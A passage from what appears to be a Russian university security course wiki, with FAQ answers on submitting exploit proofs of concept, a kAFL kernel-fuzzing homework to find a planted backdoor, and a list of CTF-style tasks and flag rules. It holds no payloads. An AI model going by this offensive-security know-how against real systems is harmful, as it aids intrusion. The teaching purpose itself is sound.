Нет, на коммит я откатился, потому что на нём я тестировал свой фаззер и вместе с ним сбилжен тестовый билд с ASAN-ом на котором проверяются ваши эксплоиты. Соответственно вам тоже удобнее будет тестировать не на последнем коммите, потому что если в проекте с тех пор появились какие-то обновления, то они могут помешать и вы не поймёте что случилось.

* У тебя там тестируется всё локально, поэтому я могу наверное как-то обмануть проверяющую систему и мне засчитается submission?

Скорее всего это не получится. Контейнеры, в которых запускаются ваш PoC и уязвимый бинарь, изолированы друг от друга и от общей докеровской сети. Кстати, в связи с этим будьте внимательны: ваш PoC должен слушать порт 5900 не на 127.0.0.1, а на 0.0.0.0

* Экслоит не работает. Что делать?

Сбилдить указанный коммит с ASAN-ом и проверить руками свой пок.

* Эксплоит работает локально, но не работает удалённо. Что делать?

Проверьте различные проблемы. Проверьте, что первой строчкой в вашем поке идёт шебанг. Вы используете питон версии 3. Ваш пок не использует лишних библиотек. Если вы сидите на винде, то замените все переводы строк с CRLF на LF. Если всё это не работает, то пишите в чат в телеграмме.

* Что должен содержать минимальный репорт?

Подробное описание где конкретно проижошла уязвимость с именами файлов, функций и номерами строк. Что привело к уязвимости: понятное и точное описание с именами переменных. Импакт от данной уязвимости. Может ли данная уязвимость привести к возможности удалённого исполнения кода. Если для этого будут требоваться другие уязвимости, то написать какие именно (например, memory leak). Если при описании импакта Вы не уверены на 100%, то можно написать об этом. Идентификатор [https://cwe.mitre.org/ CWE].

* Где создать репорт?

После того, как ваш PoC отработал со статусом "success" кнопка "Create Report" будет находиться на полной странице вашего submission_a. Там же впоследствии появится комментарий проверяющего после ревью.

== Второй семинар ==

== Третий семинар ==

На третьем семинаре мы говорили о фаззинге бинарных программ на уровне ядра.

=== Задача ===

Дан [https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing_3_hw.zip небольшой ядерный модуль] для Linux 5.4.0-72 (такое ядро есть, например, на полностью обновлённой Ubuntu 20.04). Его можно загрузить с помощью команды <code>insmod</code>. Модуль реализует простейшее устройство, принимающее файл конфигурации и возвращающее значение параметра из него. Для взаимодействия с ним можно создать устройство в файловой системе: после insmod посмотрите в выводе dmesg, какой "major device number" получило устройство test. У меня этот номер равен 241, дальше буду использовать его. Для создания файла устройства выполните команду <code>mknod /dev/test c 241 0</code>. После этого с модулем можно общаться через файл <code>/dev/test</code>. Для примера, сделайте <code>echo '{"param1": "123456"}' > /dev/test && head -c 6 /dev/test</code>.

В модуле есть "закладка", вам предлагается найти её с помощью фаззинга. Скачайте kAFL (официальный репозиторий располагается [https://github.com/IntelLabs/kAFL тут], но я советую использовать мою ветку ip_decoder_fix [https://github.com/vient/kAFL отсюда]): <code>git clone https://github.com/vient/kAFL && cd kAFL && git checkout ip_decoder_fix</code>. После этого воспользуйтесь [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Installation.md мануалами] и [https://github.com/vient/kAFL/blob/ip_decoder_fix/doc/TUTORIAL.Linux_fuzzing.md документацией] для подготовки окружения и фаззинга. Обратите внимание, что kAFL не будет работать в виртуальной машине!

Для сдачи задания вам нужно прислать тест-триггер уязвимости и описание, как высокоуровнево устроен бекдор, на [mailto:vient@seclab.cs.msu.ru мою почту]. С вопросами по поводу дз можно писать мне в телеграм @vient.

Дополнительные главы практической безопасности (2021)/Задания

2021-04-30T11:47:02Z

Asterite:

* [[Дополнительные_главы_практической_безопасности_(2021)/Задания по XXE|Задания по XXE]]
* Хотя рождество ещё не скоро, у нас тут уже заранее работает [http://christmas.tasks.course.secsem.ru/ сайт, позволяющий проверить, ждёт ли вас подарок на рождество]. Может это будет флаг?? Исходный код php-файла на этом сайте можно посмотреть, заменив расширение на <code>.phps</code>. Этот таск стоит '''100''' баллов. Дедлаин по нему: '''16 мая, 23.59'''
* [[Дополнительные_главы_практической_безопасности_(2021)/Домашнее_задание_по_фаззингу|Задания по фаззингу бинарных программ]]
* [[Дополнительные_главы_практической_безопасности_(2021)/Задания_по_темам_первых_четырёх_семинаров|Задания по темам первых четырёх семинаров]]
* [http://206.189.1.230:1337/ Задание по атакам на race condition в веб-приложениях]. Его стоимость: '''1000''' баллов

==== Формат заданий ====

В каждом задании есть один или несколько "флагов", выполняющих роль ценных данных, которые требуется найти и украсть атакующему. Для выполнения задания необходимо получить флаг и сдать его в принимающую систему. За каждый сданный флаг начисляются очки. Флаги могут иметь разную стоимость. Флаг представляет из себя строку, которая может состоять из цифр и букв английского алфавита, а также нижних подчеркиваний ("_").

Флаги, входящие в обязательную часть, будут начинаться с префикса <code>main_</code>

==== Сдача флагов ====

Флаги нужно сдавать в [http://dashboard.course.secsem.ru/ принимающую систему]. Флаги могут время от времени меняться, если вы получили флаг, но он не сдаётся, попробуйте вытащить его еще раз и сдать снова - возможно, он поменялся как раз в тот момент. Флаг за одно и то же задание засчитывается для того же сдающего только один раз (даже после изменения).

==== Поломка заданий ====

Поломка не исключена, если задание не работает, или вы думаете что что-то работает не так, как должно, пишите в чат или мне в телеграм @asterite3.